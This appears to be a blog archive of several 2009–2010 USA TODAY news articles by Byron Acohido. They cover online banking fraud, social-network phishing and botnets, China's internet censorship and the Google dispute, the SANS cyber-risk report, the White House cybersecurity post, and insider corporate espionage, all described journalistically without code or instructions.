Published July 30, 2010, USA TODAY print editions,  P1A

For generations, U.S. consumers have relied on banks to bear the primary responsibility for keeping their hard-earned cash deposits out of the hands of thieves. Now, banks want consumers to share the load.

About 80% of U.S. households have come to do their banking over the Internet, banking consultancy Novantas says. Many consumers believe online banking is every bit as safe as branch banking. But that’s clearly not the case, banking and tech security specialists say.

Cyberattacks against individual online accounts have become so sophisticated and pervasive that the American Bankers Association (ABA) is now asking consumers to “partner” with banks to keep cyberrobbers in check.

The banking industry wants consumers to monitor their online accounts for unauthorized transactions on a “continuous, almost daily, basis,” says Doug Johnson, the ABA’s vice president of risk-management policy. That’s because PCs and smartphones have become “the online bank branch for a lot of individuals,” he says. “The customer needs to really recognize that security is most effective when they work in partnership with their financial institution.”

This shifting burden has come about because of developments that the banking industry did not anticipate a decade ago, when it began promoting personal computers as convenient venues for consumer banking. Ambitious online attacks soon followed. Banks have spent heavily to shore up cyberdefenses, and they’ve kept a policy of reimbursing individual online account holders who can verify that they’ve been ripped off, Johnson says.

Even so, cyberrobbery has evolved into a multifaceted, multibillion-dollar global industry that shows little sign of cooling. Last year, the number of malicious software programs designed to pilfer online bank accounts — referred to as banking Trojans — rose to 65,098 in December, up from 4,295 at the start of 2009, according to Panda Security, a Madrid-based antivirus software supplier.

Writers of malicious software code are prolific, always focusing on new ways to get past the latest defenses erected by banks and antivirus companies, says Panda Security researcher Sean-Paul Correll.

A 2009 ABA survey of 170 U.S. banks revealed that 85% of big banks are incurring losses stemming from cyberattacks on consumer online accounts. Banks responding to the survey rated the “threat level” of online attacks at 2.58 on a scale of zero to five; that’s up from a 1.84 rating in 2007.

“Every single bank I’ve talked to in the last six months, big and small, has seen these attacks,” says Avivah Litan, banking security analyst at research firm Gartner. “It’s an arms race. There are solutions — until the next kind of attack comes along. And if you’re caught in the middle, you’re screwed.”

Successful robbers are patient

Janis Stuart, a retired San Diego personal trainer, barely dodged one recent cutting-edge attack. Returning from an out-of-town trip in April, Stuart booted up her desktop PC and began checking e-mail. She found a notice from her community bank advising her that all future e-mails would be sent to a new e-mail address, as per her online instructions. Stuart never requested such a change.

“My immediate reaction was that they had confused accounts, and this was a big mistake,” she recalls. Stuart drove down to the branch office. A clerk informed her that $5,836.66 was about to be transferred from her savings account to a woman Stuart had never heard of, in the form of a bill-payment check. Payment was stopped.

Stuart says bank officials advised her that she most likely had a computer infection that allowed an attacker to gain access to her account, change the e-mail address and set the bill payment in motion. The bank authorized the transfer because the thief knew the answers to Stuart’s “secret questions” — such as her mother’s maiden name and the city of her birth — and because a similar bill-payment check had been sent from Stuart’s account to the same woman 12 months earlier. That initial check was never cashed, Stuart says.

It was a ruse that allowed the attacker to remain undetected while establishing the woman as an approved recipient of bill-payment checks from Stuart. After waiting a year, the attacker triggered the second payment. “It was a fluke that I caught it in time before the money disappeared,” says Stuart. “I was very upset.” Stuart says she “felt the bank was somehow responsible” for enabling an intruder access to her account.

Stuart’s experience illustrates a prerequisite for accomplished cyberrobbers: patience. The cyberunderground has advanced to the point where very powerful hacking tools and tutorials are readily available for free, and a highly efficient and organized support infrastructure has been established to help thieves. Taking full advantage of such tools takes time.

Chasing thieves’ technology

Instead of holding up a bank branch at gunpoint, modern-day cyberrobbers do their homework.

“To maximize their effectiveness and streamline their ability to move money quickly, criminals take the time to learn your online banking platform and do account reconnaissance,” says Terry Austin, CEO of Guardian Analytics, which supplies fraud-detection systems.

First, they acquire valid account log-ons, often by purchasing them from specialist data thieves. Next, they quietly access accounts, making note of high cash balances and access to credit lines. They also familiarize themselves with the bank’s protocols for authorizing the creation of new online accounts and approving cash transfers.

They look for coding security holes — and invariably find them in the Web browser, the tool banks rely on to run programs that serve as a virtual bank teller. But Internet Explorer, Firefox, Opera, Google Chrome and Apple Safari are designed to let users navigate the entire Internet; they weren’t meant to execute secure financial transactions. Cyberrobbers craft banking Trojans that inject software code into the Web browser, letting the attacker take control of online banking sessions, alter what the account holder sees and make stealthy transactions.

“With the exception of some rare cases, the current online banking systems are at least one full generation behind the current techniques employed by cybercrooks,” says Costin Raiu, Kaspersky Lab research director.

Cyberrobbers also take great care in setting up “drop” accounts — online accounts they control, usually at the same bank as victims — poised to receive cash transfers. They typically recruit “money mules,” accomplices who execute the final, riskiest step of withdrawing cash from drop accounts and forwarding proceeds to the ring leaders.

Mules are recruited through work-at-home advertisements on employment websites and, increasingly, on popular social networks. Typical pitches promise high earnings for minimal work involving accepting deposits and handling cash transfers. Kaspersky Lab researcher Dmitry Bestuzhev recently tracked down one Facebook-based mule recruiter who had 224,000 friends. “Who knows how many of them accepted the offer to be a money mule?” Bestuzhev says.

In one caper recently investigated by SecureWorks, the attacker embedded a banking Trojan in the victim’s Web browser by getting the person to click on a corrupted Web link in an instant message. The Trojan watched for when the victim next accessed his online bank account and sent a copy of the user name and password to the attacker. It also automatically injected a spoofed bank form into the legitimate banking Web pages.

The bank form asked for the last four digits of the user’s debit card number, ostensibly to complete a security update. The victim complied and filled out the form. The attacker now had a key piece of information necessary to execute large cash transfers.

On a Wednesday shortly before noon, the attacker logged on and began a series of transactions. He changed the e-mail address associated with the account, so notices of any questionable transfers wouldn’t reach the account holder. He next accessed a credit card line of credit and transferred the maximum loan amount into checking.

He then emptied the account of more than $20,000, via a series of transfers into a drop account. To execute the transfers, the thief had to answer this question: “What are the last four digits of your debit card account number?” It took four days for the bank to reimburse the victim.

Such attacks are likely to continue to be commonplace, says Joe Stewart, senior threat researcher at SecureWorks. “Cybercriminals can steal credentials for thousands of accounts at a time with very little effort,” he says. “They have access to more accounts than they could possibly ever use, and most of those are personal accounts.”

Consumer distrust increases

To slow down cyberrobberies, banks increasingly are asking “knowledge-based authentication” questions at key junctures of online banking sessions, says Johnson, the bankers association risk expert. Such questions, derived from data amassed by the big three credit bureaus, Experian, Equifax and TransUnion and by data aggregators LexisNexis and Axiom, ask about obscure personal details such as the name of one’s mortgage holder or father-in-law, a previous address, even the color of one’s car.

“The questions are going to get more difficult over time,” Johnson says. “The threat is real, and (banks) are providing the tools to help customers protect themselves.”

Citibank and Bank of America rank third and seventh among the top 10 most frequently attacked banks in the world, according to Kaspersky Lab. Each uses a variety of security systems and relies on consumers to help protect their online accounts.

“It is paramount that our customers know how to protect themselves,” says Bank of America spokeswoman Tara Burke. “We recommend that customers always protect their passwords, ensure the bank has up-to-date contact information and review their accounts on a regular basis.”

Litan, the Gartner banking security analyst, says banks need to move away from technologies that rely on common Web browsers, which is where banking Trojans thrive. Handheld optical readers, a more advanced technology, are available from Gemalto and Cronto. These devices must be used to take a picture of a visual cryptogram — a secure image produced by the bank — as part of authorizing any cash transfers.

Mandatory use of a verification device that operates separately from the browser would enable banks to ensure “secure transactions no matter what is on the customer’s PC,” says Paul Beverly, executive vice president at Gemalto.

But Litan says banks are a long way from even thinking about widely distributing such devices to consumers. “They don’t want to get into the business” of providing hardware to customers, she says.

Banking and security experts say the only thing that will change the banking industry’s current approach is widespread consumer backlash. Stuart’s reaction to her brush with a near robbery could be a harbinger. The experience prompted her to get offline and revert to branch banking.

“It’s inconvenient not to be able to check my account whenever I feel like it. I have to go by the bank and ask for printouts,” says Stuart. “But at this point, I distrust the system of online banking.”

USA TODAY  P. 1A 04Mar2010

SAN FRANCISCO — “Hey Alice, look at the pics I took of us last weekend at the picnic. Bob”

That Facebook message, sent last fall between co-workers at a large U.S. financial firm, rang true enough. Alice had, in fact, attended a picnic with Bob, who mentioned the outing on his Facebook profile page.

So Alice clicked on the accompanying Web link, expecting to see Bob’s photos. But the message had come from thieves who had hijacked Bob’s Facebook account. And the link carried an infection. With a click of her mouse, Alice let the attackers usurp control of her Facebook account and company laptop. Later, they used Alice’s company logon to slip deep inside the financial firm’s network, where they roamed for weeks. They had managed to grab control of two servers, and were probing deeper, when they were detected.

Sidebar: How the Koobface worm is evolving to keep bad guys ahead

Intrusions like this one — investigated by network infrastructure provider Terremark — can expose a company to theft of its most sensitive data. Such attacks illustrate a dramatic shift underway in the Internet underground. Cybercriminals are moving aggressively to take advantage of an unanticipated chink in corporate defenses: the use of social networks in workplace settings. They are taking tricks honed in the spamming world and adapting them to what’s driving the growth of social networks: speed and openness of individuals communicating on the Internet.

“Social networks provide a rich repository of information cybercriminals can use to refine their phishing attacks,” says Chris Day, Terremark’s chief security architect.

This shift is gathering steam, tech security analysts say. One sign: The volume of spam and phishing scams — like the “LOL is this you?” viral messages sweeping through Twitter — more than doubled in the fourth quarter of 2009 compared with the same period in 2008, according to IBM’s X-Force security research team. Such “phishing” lures — designed to trick you into clicking on an infectious Web link — are flooding e-mail inboxes, as well as social-network messages and postings, at unprecedented levels.

An infected PC, referred to as a “bot,” gets slotted into a network of thousands of other bots. These “botnets” then are directed to execute all forms of cybercrime, from petty scams to cyberespionage. On Tuesday, authorities in Spain announced the breakup of a massive botnet, called Mariposa, comprising more than 12 million infected PCs in 190 countries.

Three Spanish citizens with no prior criminal records were arrested. Panda Security, of Bilbao, Spain, helped track down the alleged ringleader, who authorities say has been spreading infected links for about a year, mainly via Microsoft’s free MSN instant messenger service.

“It became too big and too noticeable,” says Pedro Bustamante, senior researcher at Panda Security. “They would have been smarter to stay under the radar.”

What happened to Bob and Alice, the picnickers at the financial firm, illustrates how social networks help facilitate targeted attacks. As a rule, tech-security firms investigate breaches under non-disclosure agreements. Honoring such a policy, Terremark used pseudonyms for the affected employees in supplying USA TODAY with details of what happened at the financial institution.

Investigators increasingly find large botnets running inside corporate networks, where they can be particularly difficult to root out or disable. “Social networks represent a vehicle to distribute malicious programs in ways that are not easily blocked,” says Tom Cross, IBM X-Force Manager.

Koobface gold mine

The attacks run the gamut. In just four weeks earlier this year, one band of low-level cyberthieves, known in security circles as the Kneber gang, pilfered 68,000 account logons from 2,411 companies, including user names and passwords for 3,644 Facebook accounts. Active since late 2008, the Kneber gang has probably cracked into “a much higher number” of companies, says Tim Belcher, CTO of security firm NetWitness, which rooted out one of the gang’s storage computers.

“Every network we see today has a significant problem with some form of organized threat,” Belcher says. The Kneber gang “happened to focus on collecting as many network-access credentials as possible.”

Stolen credentials flow into eBay-like hacking forums where a batch of 1,000 Facebook user name and password pairs, guaranteed valid, sells for $75 to $200, depending on the number of friends tied to the accounts, says Sean-Paul Correll, researcher at Panda Security. From each account, cyberscammers can scoop up e-mail addresses, contact lists, birth dates, hometowns, mothers’ maiden names, photos and recent gossip — all useful for targeting specific victims and turning his or her PC into an obedient bot, Correll says.

On the high end, the Koobface worm, initially set loose 19 months ago, continues to increase in sophistication as it spreads through Facebook, Twitter, MySpace and other social networks. At its peak last August, more than 1 million Koobface-infected PCs inside North American companies were taking instructions from criminal controllers to carry out typical botnet criminal activities, says Gunter Ollmann, vice president of research at security firm Damballa.

In another measure of Koobface’s ubiquity, Kaspersky Labs estimates that there are 500,000 Koobface-controlled PCs active on the Internet on an average day, 40% of which are in the U.S., 15% in Germany and the rest scattered through 31 other nations. “The personal information employees post day-by-day on Facebook is turning out to be a real gold mine,” says Stefan Tanase, a Kaspersky Lab senior researcher.

Facebook, the dominant social network, with 400 million members and therefore the biggest target, says recent partnerships with Microsoft and security firm McAfee to filter malicious programs help keep compromised accounts to a small percentage. “We are constantly working to improve complex systems that quickly detect and block suspicious activity, delete malicious links, and help people restore access to their accounts,” says spokesman Simon Axten.

Still, social networks have grown popular because they foster open communication among friends and acquaintances, which plays into the bad guys’ hands, says Eva Chen, CEO of anti-virus firm Trend Micro.

“These new communication platforms are where people go, so that’s where the hackers are going,” Chen says.

Meanwhile, discussions about restricting workplace use of social networks and training employees to be more circumspect are just beginning to percolate at venues like the big tech security trade show here this week sponsored by RSA, the security division of EMC. “Most larger businesses simply ask employees to watch their time spent on social-networking sites,” says Ollmann.

A noisy attack

Each infected PC in a corporate network represents a potential path to valuable intellectual property, such as customer lists, patents or strategic documents. That’s what the attackers who breached Google and 30 other tech, media, defense and financial companies in January were after. Those attacks — referred to in security circles as Operation Aurora — very likely were initiated by faked friendly messages sent to specific senior employees at the targeted companies, says George Kurtz, McAfee’s chief technology officer.

The attack on the picnicking co-workers at the financial firm illustrates how targeted attacks work. Last fall, attackers somehow got access to Bob’s Facebook account, logged into it, grabbed his contact list of 50 to 60 friends and began manually reviewing messages and postings on his profile page. Noting discussions about a recent picnic, the attackers next sent individual messages, purporting to carry a link to picnic photos, to about a dozen of Bob’s closest Facebook friends, including Alice. The link in each message led to a malicious executable file, a small computer program.

Upon clicking on the bad file, Alice unknowingly downloaded a rudimentary keystroke logger, a program designed to save everything she typed at her keyboard and, once an hour, send a text file of her keystrokes to a free Gmail account controlled by the attacker. The keystroke logger was of a type that is widely available for free on the Internet.

The attackers reviewed the hourly keystroke reports from Alice’s laptop and took note when she logged into a virtual private network account to access her company’s network. With her username and password, the attackers logged on to the financial firm’s network and roamed around it for two weeks.

First they ran a program, called a port scan, to map out key network connection points. Next they systematically scanned all of the company’s computer servers looking for any that were not current on Windows security patches. Companies often leave servers unpatched, relying on perimeter firewalls to keep intruders at bay. The attackers eventually found a vulnerable server, and breached it, gaining a foothold to go deeper.

A short time later, the attackers were discovered and cut off. One of Bob’s Facebook friends mentioned to Bob that the picnic photos he had sent had failed to render. That raised suspicions. A technician took a closer look at daily logs of data traffic on the company’s network and spotted the vulnerability scans.

Terremark’s Day says two or three collaborators, each with different skill sets, most likely worked together to pull off the attack. “They were noisy about how they went about this,” says Day. “Had they been quieter they would’ve gotten much further.”

25Jan2010

By Byron Acohido, Calum MacLeod and Kathy Chu

Original online posting here.

BEIJING — Zhang Nanting enjoys text messaging acquaintances while he’s at the Golden Fortune Internet café here. Lately, the 28-year-old insurance salesman has been meticulous about keeping his texts squeaky clean.

“I rarely send rude, short messages,” says Zhang, citing the government’s recent crackdown on pornographic texting. “I think it’s excessive management, as I don’t know how they judge what is dirty or not.”

Zhang, like most Chinese citizens and most multinational companies doing business in China, grudgingly accepts government surveillance and censorship as a way of life. But things may be changing.

Google’s (GOOG) recent threat to pull out of China has brought into sharp relief China’s longstanding clampdown on personal freedoms and foreign companies’ access to its vast consumer market. It has continued these practices even as it revs up the capitalist-style advance of the world’s fastest-growing economy.

In China, domestic “stability” is paramount. That means zero tolerance for political dissent at a time when Chinese consumers are being encouraged to embrace technologies that let them communicate and socialize much like their Western counterparts. Similarly, China has invited major tech players, such as Google, Microsoft and Yahoo, to help nurture its economic growth. Yet it imposes censorship and other restrictions and has paid little heed to intellectual-property rights.

Analysts say this is all part of China’s drive to develop — and become the dominant supplier to — the world’s most populous consumer-driven economy, with information technology as a major component. “The government in China is determined to exercise some control over mass media and the Internet,” says Harvard law professor Jonathan Zittrain. “The aim is to keep the average Internet user pointed away from controversial content and towards approved content.”

Until Google dug its heels in, China Inc. seemed to have all the cards stacked in its favor. On Jan. 11, the search giant issued a statement complaining about invasive cyberattacks and demanding that China back off on censorship of Google’s search results. “This is the first time a big company like Google has stood up and said, ‘I have had enough of this,’ ” says Hu Yong, a Beijing-based new-media expert.

China hasn’t budged — and no one expects it to. Doing business in China has never been easy. Foreign-owned companies face a thicket of censorship, trade restrictions and tariffs, says Oded Shenkar, a business management professor at Ohio State University and author of The Chinese Century.

What’s more — not unlike many other nations engaged in multinational commerce — China uses the Internet for industrial spying, says Jody Westby, CEO of consulting firm Global Cyber Risk.

China “lies in a class by itself” in the “scope and scale of its cyberespionage operations,” says Usha Haley, analyst at the Economic Policy Institute and co-author of The Chinese Tao of Business.

Multinational tech companies, in particular, bemoan China’s insistence on controlling encryption protocols that companies use to protect sensitive data. It withholds certifications until companies conform, gaining control of the decryption codes for everyone doing business within its borders, says Shenkar.

The sum of this approach: China’s economy is roaring. Its Bureau of Statistics reported gross domestic product, the key measure of a nation’s growth, rose 10.7% in the fourth quarter and 8.7% overall in 2009. Its banking sector issued $1.2 trillion in new loans last year. By the end of October, China held $798.9 billion in U.S. Treasury notes, making the U.S. its biggest borrower.

Yet the growth comes as reforms that arose from the government’s 30-year “opening up” campaign are stalling out, says Joerg Wuttke, president of the European Union Chamber of Commerce in China. A September 2009 chamber report recounts a three-year rise in “industrial-policy interventions.” It found protectionism woven into standardization policies on products from cellphones to medical equipment, subjective enforcement of environmental rules favoring Chinese firms, and intellectual-property theft becoming a major concern.

In this backdrop, Google’s push-back could coalesce a broader shift in sentiment already underway. Many companies sense that access to Chinese markets is actually shrinking, Wuttke says. “The investment atmosphere has shifted,” he says. “It’s an indication that foreign companies are struggling.”

That’s because “China doesn’t believe in survival of the fittest. It believes in ’survival of whomever we say survives,’ ” says Anthony Migyanka, an economist and managing partner at Texas-based Mobile Money Minute.

Energizing activists

But China may be reaching the limits to that approach. On Thursday, Secretary of State Hillary Rodham Clinton proposed policies to quell censorship and ingrain freedom of expression on the Internet as a global standard. Clinton called on China to be transparent about responding to Google. She also threw down a gauntlet for U.S. corporations. “Censorship should not be in any way accepted by any company from anywhere,” said Clinton. “This needs to be part of our national brand.”

The Beijing-based Xinhua News Agency on Friday issued an official response. Chinese Foreign Ministry spokesman Ma Zhaoxu called on the United States to “respect facts and stop unreasonable accusations on China in the name of so-called Internet freedom.”

Clinton’s speech energized privacy and human rights activists, who’ve been tilting with Internet censors and hackers in China, Vietnam, Iran, North Korea and Tunisia. Clinton pledged $15 million to support “Internet freedom” projects, including helping non-profit organizations plot “circumvention strategies.”

“New technology demands new thinking about how companies and governments can each work to protect freedom,” says Elisa Massimino, CEO of Human Rights First.

China’s leaders aren’t completely immune to criticism. But for China, nothing counts more than domestic stability, which government leaders achieve by squelching dissent. Go along and you’re left alone to consume like a Westerner; resist and pay the consequences.

For the past six months, China has sent a vast region, larger than Alaska, back to the pre-Internet age. Last week, residents of Xinjiang, the nation’s Muslim northwest, were permitted to send text messages again. But international telephone calls are limited, and Internet use remains greatly proscribed, after ethnic riots in July.

Such actions remind Chinese citizens who is in control. Underground, in the dimly lit Golden Fortune Internet cafe and pool bar in Beijing’s Chongwen District, Zhang must register his ID card before logging on to one of 80 computers. Then he faces the “Great Firewall of China,” an array of official censorship tools designed to curb his surfing.

“Of course I wish I could read whatever I want,” he says, but he rarely bothers “climbing the wall” to bypass the censor’s blocks. “It’s too complicated.”

Playing along

Historically, tech giants Microsoft, Yahoo and even Google have played along to get along in China. To gain approval to launch google.cn and open a high-rise office in Beijing in 2006, the search giant accepted censorship of search queries and results, such as references to the Tiananmen Square massacre. In a speech to Houston oil executives on Thursday, Microsoft CEO Steve Ballmer said that Microsoft intends to obey China’s specific censorship requests just as it follows laws in every country.

Yahoo has done that, too. The portal company infamously forked over data to Chinese officials that in 2004 helped convict journalist Shi Tao for leaking a propaganda directive. Shi was sent to prison for 10 years.

The kowtowing hasn’t exactly paid huge dividends. Yahoo sold its China business, also in 2004, to Chinese company Alibaba, giving up day-to-day management of its China operations. Yahoo retained a 39% stake in Alibaba.

Microsoft in 2002 began investing $750 million to help seed an indigenous Chinese tech sector, including opening a major research-and-development center in Shanghai. But the software giant has no illusions about dominating the Chinese PC software market, says Matt Rosoff, tech industry analyst at Directions on Microsoft. Windows PCs already are widely used in China, but 90% run pirated copies of Windows, says Rosoff.

Microsoft figures investing in the maturation of the Chinese tech industry will help drive down the piracy rate. Over time, Microsoft hopes, millions of Chinese will begin paying for their copy of Windows, Rosoff says.

For its part, Google has quickly become a mainstay with young professionals. It has a 20% share of the Chinese search market compared with search leader Baidu’s 70%, according to China IntelliConsulting.

Chinese tech firms, such as Baidu, “are extremely scrappy,” says Kaiser Kuo, a Beijing-based tech consultant. “They’ve managed to get the notoriously frugal Chinese consumer to part with money.”

Whether Google leaves China or stays remains to be seen. “The environment in which we are operating in terms of an open Internet is not improving in China,” says David Drummond, Google’s chief legal officer. “We’re no longer comfortable censoring our search results in China, and we are reviewing the feasibility of our operations there.”

Noting Google’s respect for the Chinese people, Drummond said it will keep a Chinese-language option on its global service if it shuts down google.cn.

Meanwhile, James McGregor, a Beijing-based consultant at APCO Worldwide, says complaints about mounting restrictions — he describes it as a lot of “little things at every level … by every ministry” — are reaching a crescendo. He says there is a high level of “clandestine support” for Google in the multinational business community. Google’s protest “has the possibility of stirring up a lot of people here who depend on Google and don’t want to lose it,” says McGregor.

Much could be riding on the resolution. Will Western values factor in or will China’s tactics prevail? “The 21st century is about whether and where a converging balance will be found. Google is just the beginning,” says international lawyer Jeanne-Marie Gescher.

MacLeod reported from Beijing, Chu from Hong Kong and Acohido from Seattle. Contributing: Jon Swartz in San Francisco

The SANS Institute’s report on Top Cyber Risks is by far the most comprehensive accounting of ongoing cyber attacks ever made public. SANS is the well-respected Washington D.C.-based tech security think tank and training center. The organization distilled attack data from 6,000 companies and government agencies protected by defense systems supplied by two leading tech security companies, TippingPoint and Qualys.

SANS’ cornerstone finding: the vast bulk of attacks to infect home and workplace computers, enlist them into bot networks, and then use them to carry out criminal activities spin off two pervasive weaknesses.

The first: unpatched vulnerabilities in popular consumer applications, especially Adobe’s Acrobat Reader and Flash Player, Apple QuickTime and Microsoft Office. The second: security weaknesses in the Web applications that enable all the cool features on Web 2.0 sites.

Hand in glove

These two weaknesses work hand-in-glove — to the benefit of the bad guys. Here’s how:

Many cyberattacks hinge on getting a victim to click on a corrupted URL, as I explained in my 03Sept2009 USA Today news story.

Of course, the bad URL had to be tainted at some point earlier. Attackers most often do this via SQL injection exploits of legit Web pages; these automated attacks seek out and take advantage of Web sites running poorly- written Web applications.

“Organizations need to pay more attention to the security of their critical software applications,” says Roger Thornton, co-founder and CTO of Fortify Software. “Today’s cybercriminals have  moved to the easiest breach points, which is now the applications an organization uses to conduct its business.”

Upon cracking a Web page, the hacker will typically use off-the-shelf, tried-and-true tools, such as Mpack or IcePack, for the next step. These tools will efficiently seek out security holes in  popular PC applications — the everyday programs that can be found on just about any PC, including Internet Explorer, Acrobat Reader, Flash Player, Microsoft Office.

A bot is born

Mpack and IcePack and other similar tools go to work on newly infected computers. They quickly run through an extensive list of known vulnerabilities for all popular consumer apps — and exploit the first unpatched vulnerability they run into. The exploit almost always begins with the installation of a tiny wormhole, called a “Trojan downloader,” that secures ongoing access to the hard drive.

The attacker next uses this wormhole to install a botnet management program that turns the computer into an obedient “bot,” reporting to a command-and-control server operated by the “botmaster.” The top botmasters run mega botnets tens of thousands, or even hundreds of thousands of bots strong, with names like Waledac, Pushdo, Cutwail, Rustock, Mega-D and Storm.

Each freshly infected bot instantly begins to participate in myriad criminal activities – everything from spreading spam to triggering scareware promotions to hijacking online banking accounts to participating in politically-motivated Distributed Denial-of-Service attacks.

Top botmasters make use of infected machines judiciously — they’ll pay attention to time zones and use machines during early morning hours when the owner is asleep, for instance. They will also put bots to sleep for a time and use them again later, like letting farmland go fallow. This is to keep control of the bot for an extended period. For obvious reasons, fresh bots are always in high demand.

“The vast bulk of new bots are created when unsuspecting users visit trusted Web sites that are also infected,” says Alan Paller, SANS research director. “Web attacks take advantage of client-side vulnerabilities that are being given insufficient attention by cyber defenders. The web attacks also take advantage of Web programming errors that are not being picked up by common vulnerability scanners.”

The bottom line, says Paller, is that “two cyber risks dwarf all others and users are not effectively mitigating them.”

Web threats mushroom

Serendipitously, SANS  released the results of its milestone survey the same day Websense released its bi-annual threat report covering the first half of 2009. Websense keeps  track of Web-based attacks hitting the networks of its corporate customers; it reported a whopping 671 percent spike in malicious Web links in the first half of 2009 compared to the first half of 2008.

What’s worse: corrupted legitimate sites account for an estimated 77 percent of the bad links lurking on there in the Internet wild.

Web properties that encourage user-generated content — such as media sites, social networks and popular blogs — have become popular targets. This was vividly demonstrated just last weekend when hackers served up viral advertisements all across the New York Times’ Web site.

In a similar attack on USA Today’s Web site last May, cyber criminals patronized a legit ad placement agency to purchase advertising space on USA Today’s Life home page. The crooks then supplied the ad agency with copies of ads for Roxio Creator 2009 and Phoenix University. Then once every hour or so, the crooks sent through an ad containing a bit of malicious code, as shown below. This bad code redirected the visitor’s PC to an insistent promotion to buy worthless antivirus protection.

“Neither clicking, nor hovering over the ad was required to activate the malicious code,” says Purewire researcher Paul Royal, who discovered the USA Today attack. “In addition, the (corrupted) ad could have been, and likely was, served almost anywhere on USA Today’s website.”

Anyone who happened to visit USA Today’s Life home page at the moment the corrupted Roxio ad appeared was infected. Yet, had an investigator checked shortly thereafter, the crooks’ ad would have been found to be clean of any bad code, says Roger Thompson, senior researcher at AVG. This technique of paying an ad network to post a string of harmless, innocuous ads — sporadically replaced by a corrupted ad — has been used widely for at least two years, Thompson says.

So far this year, community-driven security tools, like those used on YouTube and BlogSpot, are proving to be “65% to 75% ineffective” at protecting users, says Websense CTO Dan Hubbard.

“The last six months have shown that malicious hackers and fraudsters go where the people are on the Web,” he says. “From malicious Twitter spam campaigns and blog comment spam to the massive SQL injection attacks, those perpetrating fraud are exploiting the inherent trust users have of known Web properties and other users.”

Web threats graphic courtesy of Trend Micro

–By Byron Acohido

Hathaway was widely hailed for completing a 60-day review of U.S. cybersecurity policy, setting up President Obama’s milestone May 29th speech, in which he became the first head of state to articulate the necessity for explicit national  policies to make the Internet safer.

After her appearance last April as a keynote speaker at the RSA 2009 security conference in San Francisco, in which she spoofed her task in a Mission Impossible skit, some considered Hathaway a front runner to be named Obama’s cybersecurity adviser.

But yesterday she removed herself from consideration. The move could shake things up and pave the way for the selection of a so-called cybersecurity czar from a short list of finalists, which Obama been mulling for some eight weeks now.

“She is, as always, a gracious leader,” Alan Paller, research director at The SANS Institute, says of Hathaway. “When she learned she was not to be the choice, the best thing she could do to raise the priority of selecting the new person was to leave.”

White House weighs in

A White House statement notes that Hathaway had been on temporary detail to the National Security Staff from the Office of the Director of National Intelligence. Her initial assignment was up on April 9th and her second detail officially ends August 9th.

“We are grateful for her dedicated service and for the significant progress she and her team have made on our national cyber security strategy,” says White House spokesman Nick Shapiro. “Cyber security is a major priority for the President.”

Shapiro re-iterated the key takeaway from Obama’s historic speech: that a selection process was underway to fill the newly created post of “White House cyber security coordinator.”  He also noted that the appointee ” will have direct access to the President,”  and that the administration “is pursuing a new comprehensive approach to securing America’s digital infrastructure.”

“The President is personally committed to finding the right person for this job,” says Shapiro. “A rigorous selection process is well underway.”

Lack of empowerment

“Hathaway told Washington Post reporter Ellen Nakashima that she wasn’t empowered to “drive the change” called for in her review and punctuated by Obama’s historic speech. The central notion — that White House leadership is necessary to stem rising cyber threats — was hammered out in two years worth of consensus building among business and military leaders, lawmakers and regulators, and the intelligence community.

The Center for Strategic and International Studies’ last December presented Obama with this stack of recommendations. The document has been downloaded more than 30,000 times. And supporting proof points came in this report by the Government Accountability Office.

“I’ve concluded that I can do more now from a different role,” Hathaway told Nakashima.

More questions than answers

The devil, as always,  is in the details. Two sweltering months of summer have elapsed with the White House still debating who should take the hot seat, and how much of the president’s ear that person will have.

“At present, there are more questions than answers regarding the new position.  What will he or she really do? ” remarks Todd McClelland, partner at the influential Washington D.C. law firm, Alston & Bird. He said the legal community is calling for the czar “to establish clarity regarding security and privacy rules and regulations.”

Daniel Ives, an analyst at FBR Capital Markets, says there is no indication that Obama is close to naming anyone to the post.

“We fully expect more speed bumps, ” says Ives. “This cybesecurity initiative is a massive, multi-decade task that will be very onerous, complex, and touch agencies across the entire government as the US undergoes a major facelift on its security infrastructure.”

Photo caption: Hathaway at Moscone Center, San Francisco, April 2009,  delivering ‘Mission Impossible’  keynote speech at RSA security conference. photo by Byron Acohido

–By Byron Acohido

USA TODAY

See initial version here.

By Byron Acohido, USA TODAY
Marla Suttenberg had a sinking feeling that a corporate spy was shadowing her.

In March 2008, the owner of Woodcliff Lake, N.J.-based Sapphire Marketing was preparing to give a longtime client a generous price cut on $134,000 worth of audio/videoconferencing equipment.

But before her sales rep could extend the offer, her chief rival, David Goldenberg, then regional vice president of sales for AMX, a Dallas-based conferencing systems maker, sent the client an e-mail disparaging Sapphire and offering a steeper AMX discount.

“I felt sick to my stomach,” Suttenberg recalls. To pull that off, someone had to have infiltrated Sapphire’s internal e-mail, she thought at the time.

She was right. A few days later, Goldenberg, 48, of Oceanside, N.Y., was arrested. He subsequently pleaded guilty to felony wiretapping for tampering with Sapphire’s e-mail. He was sentenced last month to three months probation and ordered to undergo counseling. “There was nothing sophisticated about me getting into their e-mail,” he said in an interview. “Honestly, I had no idea that it was illegal.”

Corporate espionage using very simple tactics – much of it carried out by trusted insiders, familiar business acquaintances, even janitors – is surging. That’s because businesses large and small are collecting and storing more data than ever before. What’s more, companies are blithely allowing broad access to this data via nifty Internet services and cool digital devices.

“Having more sensitive information being seen by more people and accessed on more devices drives up risk significantly,” says Kurt Johnson, vice president at Courion, a supplier of identity management systems.

The slumping economy doesn’t help. “Mass layoffs have increased internal threat levels dramatically,” says Grant Evans, CEO of ActivIdentity, which makes smart cards and security tokens.

Employees worried about job security face rising temptations to seek out and hoard proprietary data that could help boost their job performance, or at least make them more marketable should they get laid off, says Adam Bosnian, vice president at Cyber-Ark Software, another identity management systems supplier.

Of the 400 information technology pros who participated in a recent Cyber-Ark survey, 74% said they knew how to circumvent security to access sensitive data, and 35% admitted doing so without permission. Among the most commonly targeted items: customer databases, e-mail controls and CEO passwords.

Cellphones, digital cameras and USB dongles come with vast memory – enough to store data that a few years ago might have required a stack of CDs, says Nick Newman, computer crimes specialist at the non-profit National White Collar Crime Center. Web services, such as Hotmail, Yahoo Mail and Gmail, and popular social networks, such as Facebook and Twitter, make terrific free tools for transferring and storing pilfered data anonymously.

“If you create an environment where your employees can walk freely out the door with unencrypted, proprietary data, it’s only a matter of time before someone actually does it,” says Sam Masiello, vice president at messaging and browser security firm MX Logic.

Lax passwords a danger

The exposure redoubles at companies that are lax about passwords. Last week, a hacker pilfered sensitive Twitter business documents and released them publicly. Twitter co-founder Biz Stone said in a statement that the hacker got in by figuring out the log-on of a Twitter employee who used the same non-unique password for several online accounts.

